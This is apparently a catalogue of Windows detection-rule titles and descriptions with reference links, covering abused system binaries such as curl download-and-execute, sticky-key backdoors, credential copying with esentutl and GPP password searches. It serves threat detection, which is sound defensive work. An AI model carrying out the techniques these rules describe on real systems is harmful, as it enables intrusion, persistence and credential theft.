Attackers can abuse this utility in order to download arbitrary files via a configuration file.
Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
|
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/, https://twitter.com/SwiftOnSecurity/status/1455897435063074824, https://github.com/LOLBAS-Project/LOLBAS/pull/151 |
Change Default File Association To Executable Via Assoc |
Detects when a program changes the default file association of any extension to an executable.
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc |
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE |
Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Curl Download And Execute Combination |
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. |
https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 |
File Deletion Via Del |
Detects execution of the builtin "del"/"erase" commands in order to delete files.
Adversaries may delete files left behind by the actions of their intrusion activity.
Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase |
Greedy File Deletion Using Del |
Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. |
https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase |
File And SubFolder Enumeration Via Dir Command |
Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md |
Potential Dosfuscation Activity |
Detects possible payload obfuscation via the commandline |
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf, https://github.com/danielbohannon/Invoke-DOSfuscation |
Command Line Execution with Suspicious URL and AppData Strings |
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) |
https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100, https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100 |
Potential Privilege Escalation Using Symlink Between Osk and Cmd |
Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. |
https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md, https://ss64.com/nt/mklink.html |
VolumeShadowCopy Symlink Creation Via Mklink |
Shadow Copies storage symbolic link creation using operating systems utilities |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Suspicious File Execution From Internet Hosted WebDav Share |
Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files |
https://twitter.com/ShadowChasing1/status/1552595370961944576, https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior |
Cmd.EXE Missing Space Characters Execution Anomaly |
Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
This could be a sign of obfuscation of a fat finger problem (typo by the developer).
|
https://twitter.com/cyb3rops/status/1562072617552678912, https://ss64.com/nt/cmd.html |
Potential CommandLine Path Traversal Via Cmd.EXE |
Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking |
https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/, https://twitter.com/Oddvarmoe/status/1270633613449723905 |
NtdllPipe Like Activity Execution |
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe |
https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe |
Potentially Suspicious Ping/Copy Command Combination |
Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
|
Internal Research |
Suspicious Ping/Del Command Combination |
Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example |
https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf, https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware |
Potentially Suspicious CMD Shell Output Redirect |
Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
|
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Directory Removal Via Rmdir |
Detects execution of the builtin "rmdir" command in order to delete directories.
Adversaries may delete files left behind by the actions of their intrusion activity.
Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase |
Copy From VolumeShadowCopy Via Cmd.EXE |
Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ |
Read Contents From Stdin Via Cmd.EXE |
Detect the use of "<" to read and potentially execute a file via cmd.exe |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md, https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe |
Persistence Via Sticky Key Backdoor |
By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
When the sticky keys are "activated" the privilleged shell is launched.
|
https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html, https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf, https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors |
Sticky Key Like Backdoor Execution |
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen |
https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors |
Potential Download/Upload Activity Using Type Command |
Detects usage of the "type" command to download/upload data from WebDAV server |
https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 |
Unusual Parent Process For Cmd.EXE |
Detects suspicious parent process for cmd.exe |
https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html |
CMSTP Execution Process Creation |
Detects various indicators of Microsoft Connection Manager Profile Installer execution |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
Arbitrary File Download Via ConfigSecurityPolicy.EXE |
Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
Users can configure different pilot collections for each of the co-management workloads.
It can be abused by attackers in order to upload or download files.
|
https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/ |
Powershell Executed From Headless ConHost Process |
Detects the use of powershell commands from headless ConHost window.
The "--headless" flag hides the windows from the user upon execution.
|
https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Suspicious High IntegrityLevel Conhost Legacy Option |
ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. |
https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29, https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control |
Conhost.exe CommandLine Path Traversal |
detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking |
https://pentestlab.blog/2020/07/06/indirect-command-execution/ |
Uncommon Child Process Of Conhost.EXE |
Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. |
http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ |
Conhost Spawned By Uncommon Parent Process |
Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. |
https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html |
Control Panel Items |
Detects the malicious use of a control panel item |
https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins |
CreateDump Process Dump |
Detects uses of the createdump.exe LOLOBIN utility to dump process memory |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960 |
Dynamic .NET Compilation Via Csc.EXE |
Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. |
https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe |
Csc.EXE Execution Form Potentially Suspicious Parent |
Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. |
https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing, https://reaqta.com/2017/11/short-journey-darkvnc/, https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html |
Suspicious Csi.exe Usage |
Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/, https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/, https://twitter.com/Z3Jpa29z/status/1317545798981324801 |
Suspicious Use of CSharp Interactive Console |
Detects the execution of CSharp interactive console by PowerShell |
https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/ |
Active Directory Structure Export Via Csvde.EXE |
Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. |
https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://redcanary.com/blog/msix-installers/ |
Potential Cookies Session Hijacking |
Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. |
https://curl.se/docs/manpage.html |
Curl Web Request With Potential Custom User-Agent |
Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv |
File Download From IP URL Via Curl.EXE |
Detects file downloads directly from IP address URL using curl.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt |
Suspicious File Download From IP Via Curl.EXE |
Detects potentially suspicious file downloads directly from IP addresses using curl.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt |
Suspicious File Download From File Sharing Domain Via Curl.EXE |
Detects potentially suspicious file download from file sharing domains using curl.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv |
Insecure Transfer Via Curl.EXE |
Detects execution of "curl.exe" with the "--insecure" flag. |
https://curl.se/docs/manpage.html |
Insecure Proxy/DOH Transfer Via Curl.EXE |
Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. |
https://curl.se/docs/manpage.html |
Suspicious Curl.EXE Download |
Detects a suspicious curl process start on Windows and outputs the requested document to a local file |
https://twitter.com/max_mal_/status/1542461200797163522, https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464, https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt, https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file |
Local File Read Using Curl.EXE |
Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. |
https://curl.se/docs/manpage.html |
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse |
Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.
This binary can be abused for DLL injection, arbitrary command and process execution.
|
https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424 |
Uncommon Child Process Of Defaultpack.EXE |
Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/, https://www.echotrail.io/insights/search/defaultpack.exe |
Remote File Download Via Desktopimgdownldr Utility |
Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. |
https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html |
Suspicious Desktopimgdownldr Command |
Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet |
https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825 |
Potential DLL Sideloading Via DeviceEnroller.EXE |
Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll".
Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
|
https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html |
Potentially Suspicious Child Process Of ClickOnce Application |
Detects potentially suspicious child processes of a ClickOnce deployment application |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Arbitrary MSI Download Via Devinit.EXE |
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system |
https://twitter.com/mrd0x/status/1460815932402679809, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/ |
DirLister Execution |
Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md, https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ |
PowerShell Web Access Feature Enabled Via DISM |
Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse |
https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41 |
Potentially Suspicious Child Process Of DiskShadow.EXE |
Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. |
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ |
Diskshadow Script Mode - Uncommon Script Extension Execution |
Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension.
Initial baselining of the allowed extension list is required.
|
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ |
Diskshadow Script Mode - Execution From Potential Suspicious Location |
Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. |
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ |
Dism Remove Online Package |
Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism, https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html |
Dllhost.EXE Execution Anomaly |
Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. |
https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
DLL Sideloading by VMware Xfer Utility |
Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL |
https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ |
Potential Discovery Activity Via Dnscmd.EXE |
Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd, https://learn.microsoft.com/en-us/azure/dns/dns-zones-records, https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ |
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE |
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) |
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html |
DNS Exfiltration and Tunneling Tools Execution |
Well-known DNS Exfiltration tools execution |
https://github.com/iagox86/dnscat2, https://github.com/yarrick/iodine |
Unusual Child Process of dns.exe |
Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) |
https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html |
Potential Application Whitelisting Bypass via Dnx.EXE |
Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
Attackers might abuse this in order to bypass application whitelisting.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ |
Process Memory Dump Via Dotnet-Dump |
Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
|
https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect, https://twitter.com/bohops/status/1635288066909966338 |
Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE |
Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/, https://twitter.com/_felamos/status/1204705548668555264, https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/ |
Binary Proxy Execution Via Dotnet-Trace.EXE |
Detects commandline arguments for executing a child process via dotnet-trace.exe |
https://twitter.com/bohops/status/1740022869198037480 |
Potential Recon Activity Using DriverQuery.EXE |
Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers |
https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html |
DriverQuery.EXE Execution |
Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers |
https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html |
Potentially Over Permissive Permissions Granted Using Dsacls.EXE |
Detects usage of Dsacls to grant over permissive permissions |
https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11) |
Potential Password Spraying Attempt Using Dsacls.EXE |
Detects possible password spraying attempts using Dsacls |
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone, https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11) |
Domain Trust Discovery Via Dsquery |
Detects execution of "dsquery.exe" for domain trust discovery |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md, https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843 |
Suspicious Kernel Dump Using Dtrace |
Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 |
https://twitter.com/0gtweet/status/1474899714290208777?s=12, https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace |
Potential Windows Defender AV Bypass Via Dump64.EXE Rename |
Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
|
https://twitter.com/mrd0x/status/1460597833917251595 |
DumpMinitool Execution |
Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" |
https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/, https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f |
Suspicious DumpMinitool Execution |
Detects suspicious ways to use the "DumpMinitool.exe" binary |
https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/ |
New Capture Session Launched Via DXCap.EXE |
Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/, https://twitter.com/harr0ey/status/992008180904419328 |
Esentutl Gather Credentials |
Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. |
https://twitter.com/vxunderground/status/1423336151860002816, https://attack.mitre.org/software/S0404/, https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ |
Copying Sensitive Files with Credential Data |
Files with well-known filenames (sensitive files with credential data) copying |
https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/, https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml |
Esentutl Steals Browser Information |
One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe |
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/, https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/ |
Potentially Suspicious Event Viewer Child Process |
Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt |
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 |
Potentially Suspicious Cabinet File Expansion |
Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks |
https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll, https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ |
Explorer Process Tree Break |
Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
|
https://twitter.com/CyberRaiju/status/1273597319322058752, https://twitter.com/bohops/status/1276357235954909188?s=12, https://twitter.com/nas_bench/status/1535322450858233858, https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ |
File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell |
Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
|
https://ss64.com/nt/shell.html |
Explorer NOUACCHECK Flag |
Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks |
https://twitter.com/ORCA6665/status/1496478087244095491 |
Remote File Download Via Findstr.EXE |
Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
|
https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Findstr GPP Passwords |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr |
Findstr Launching .lnk File |
